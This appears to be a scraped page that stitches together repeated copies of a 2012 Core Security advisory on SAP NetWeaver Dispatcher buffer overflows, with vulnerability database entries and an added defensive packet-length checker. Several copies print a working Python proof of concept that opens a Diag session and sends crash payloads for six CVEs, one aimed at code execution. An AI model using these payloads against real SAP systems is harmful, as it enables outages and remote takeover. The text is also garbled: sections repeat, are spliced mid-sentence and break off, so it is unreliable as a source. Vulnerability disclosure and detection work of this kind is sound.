CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
3. *Vulnerability Description*
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. The
vulnerabilities are triggered by sending specially crafted SAP Diag packets
to remote TCP port 32NN (NN being the SAP system number) of a host
running the "Dispatcher" service, part of SAP Netweaver Application
Server ABAP. By sending different messages, the different
vulnerabilities can be triggered.
4. *Vulnerable packages*
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
7. *Credits*
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
8. *Technical Description / Proof of Concept Code*
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
                  default="localhost")
parser.add_option("-p", "--port", dest="port", type="int",
                  help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize(sock):
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect + support_data))
    dpheader+= "\x00\xff\xff\xff\xff\xff\xff "
    dpheader+= "terminalXXXXXXX"
    dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message):
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)

# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module processes a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. This vulnerability
could allow a remote unauthenticated attacker to execute arbitrary code
with the privileges of the user running the "Dispatcher" service. The
following python code can be used to trigger the vulnerability:
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
8.2. The following python code can be used to
trigger the vulnerability:
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
8.3. The
following python code can be used to trigger the vulnerability:
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
8.4.
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
8.5.
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
8.6.
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
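The messages in section 8 all use the framing built by send_packet() and send_message(): a 4-byte big-endian length, 8 header bytes, then items that carry their own length field, closed by a 0x0c byte. The following Python 3 code is an added example, not part of the Core advisory or of SAP's software: a sensor-side check that flags messages whose declared item lengths do not fit the message they arrive in. The length-field widths per item type, the finding codes, MAX_FRAME and the sample stream are assumptions constructed for illustration.

```python
import struct

DIAG_HEADER_LEN = 8   # send_message() starts every message with 8 header bytes
ITEM_EOM = 0x0C       # single byte that closes a message
# Item type -> width of the big-endian length field that follows the
# type, id and sid bytes. Widths are inferred from the advisory's packets
# (assumption, not taken from SAP documentation).
LENGTH_WIDTH = {0x10: 2, 0x12: 4}
MAX_FRAME = 1 << 20   # sensor policy cap on one frame (assumed value)


def split_frames(stream):
    """Split a byte stream into payloads using the 4-byte '!I' prefix.

    Returns (payloads, findings); each finding is (stream_offset, code).
    """
    payloads, findings, off = [], [], 0
    while off < len(stream):
        if len(stream) - off < 4:
            findings.append((off, "truncated-length-prefix"))
            break
        (length,) = struct.unpack_from("!I", stream, off)
        if length > MAX_FRAME:
            findings.append((off, "frame-too-large"))
            break
        if length > len(stream) - off - 4:
            findings.append((off, "truncated-frame"))
            break
        payloads.append(stream[off + 4: off + 4 + length])
        off += 4 + length
    return payloads, findings


def check_items(payload):
    """Walk the items after the header; return a list of (offset, code).

    Applies to messages sent after initialization; the first packet of a
    session carries an extra header and is not handled here.
    """
    if len(payload) < DIAG_HEADER_LEN:
        return [(0, "short-header")]
    off = DIAG_HEADER_LEN
    while off < len(payload):
        item_type = payload[off]
        if item_type == ITEM_EOM:
            if off + 1 != len(payload):
                return [(off + 1, "data-after-eom")]
            return []
        width = LENGTH_WIDTH.get(item_type)
        if width is None:
            return [(off, "unknown-item-type")]
        body = off + 3 + width            # first byte of the item value
        if body > len(payload):
            return [(off, "truncated-item-header")]
        declared = int.from_bytes(payload[off + 3: body], "big")
        if declared > len(payload) - body:
            return [(off, "length-exceeds-message")]
        off = body + declared
    return [(off, "missing-eom")]


def inspect_stream(stream):
    """Return (frame_index, offset, code) findings; index -1 means framing."""
    payloads, framing = split_frames(stream)
    report = [(-1, off, code) for off, code in framing]
    for index, payload in enumerate(payloads):
        report += [(index, off, code) for off, code in check_items(payload)]
    return report


def frame(payload):
    """Length-prefix a payload the same way send_packet() does."""
    return struct.pack("!I", len(payload)) + payload


# Constructed sample traffic (not a capture).
HEADER = b"\x00" * DIAG_HEADER_LEN
STEP = b"\x10\x04\x26\x00\x04\x00\x00\x00\x01"  # step item from send_message()
SAMPLE_STREAM = (
    frame(HEADER + STEP + b"\x0c")                                        # consistent
    + frame(HEADER + STEP + b"\x10\x01\x01\x00\x40" + b"AB" + b"\x0c")    # 2-byte length 64, 3 bytes left
    + frame(HEADER + STEP + b"\x12\x01\x01\xff\xff\xff\xff" + b"AB\x0c")  # 4-byte length 0xffffffff
    + frame(HEADER + STEP)                                                # no closing 0x0c
)

if __name__ == "__main__":
    for finding in inspect_stream(SAMPLE_STREAM):
        print(finding)
```

Items whose declared length is accurate pass this check, so it complements the SAP security note and the port restriction from section 6 rather than replacing them.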
9. *Report Timeline*
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012.
. 2012-01-24:
Core sends an advisory draft with technical details.
. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline.
. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible.
. 2012-02-21:
First release date missed.
. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed.
. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012.
. 2012-02-23:
Core re-schedules the advisory publication to May 8th.
. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix.
. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed.
. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).
. 2012-05-07:
Core asks again for the status of the fix.
. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].
. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.
. 2012-05-08:
Advisory CORE-2012-0123 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201205-0128 | CVE-2012-2612 |
SAP NetWeaver DiagTraceHex function denial-of-service (daemon crash) vulnerability
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application.
| VAR-201205-0127 | CVE-2012-2611 |
SAP NetWeaver DiagTraceR3Info function arbitrary code execution vulnerability
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application.
| VAR-201205-0132 | CVE-2012-2514 |
SAP NetWeaver DiagiEventSource function denial-of-service (daemon crash) vulnerability
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application.
TITLE:
SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID:
SA48980
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48980/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
RELEASE DATE:
2012-05-09
DESCRIPTION:
Core Security Technologies has reported multiple vulnerabilities in
SAP NetWeaver, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
PROVIDED AND/OR DISCOVERED BY:
Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
. *Advisory Information*
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
3. *Vulnerability Description*
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. By sending different messages, the different
vulnerabilities can be triggered.
4. *Vulnerable packages*
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
7. *Credits*
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
8. *Technical Description / Proof of Concept Code*
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
                  default="localhost")
parser.add_option("-p", "--port", dest="port", type="int",
                  help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize(sock):
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect + support_data))
    dpheader+= "\x00\xff\xff\xff\xff\xff\xff "
    dpheader+= "terminalXXXXXXX"
    dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message):
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)

# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module processes a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. The
following python code can be used to trigger the vulnerability:
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
8.2. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
8.3. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
8.4.
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
8.5.
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
8.6. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
9. *Report Timeline*
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012.
. 2012-01-24:
Core sends an advisory draft with technical details.
. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline.
. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible.
. 2012-02-21:
First release date missed.
. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed.
. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012.
. 2012-02-23:
Core re-schedules the advisory publication to May 8th.
. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix.
. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed.
. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).
. 2012-05-07:
Core asks again for the status of the fix.
. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].
. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.
. 2012-05-08:
Advisory CORE-2012-0123 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201205-0131 | CVE-2012-2513 | SAP NetWeaver of Diaginput Service disruption in functions ( Daemon crash ) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application.
TITLE:
SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID:
SA48980
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48980/
RELEASE DATE:
2012-05-09
DESCRIPTION:
Core Security Technologies has reported multiple vulnerabilities in
SAP NetWeaver, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
PROVIDED AND/OR DISCOVERED BY:
Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
| VAR-201205-0130 | CVE-2012-2512 | SAP NetWeaver of DiagTraceStreamI Denial of service in function ( Daemon crash ) Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application.
1. *Advisory Information*
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
3. *Vulnerability Description*
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. By sending different messages, the different
vulnerabilities can be triggered.
4. *Vulnerable packages*
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
7. *Credits*
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
8. *Technical Description / Proof of Concept Code*
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
                  default="localhost")
parser.add_option("-p", "--port", dest="port", type="int",
                  help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize(sock):
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = \
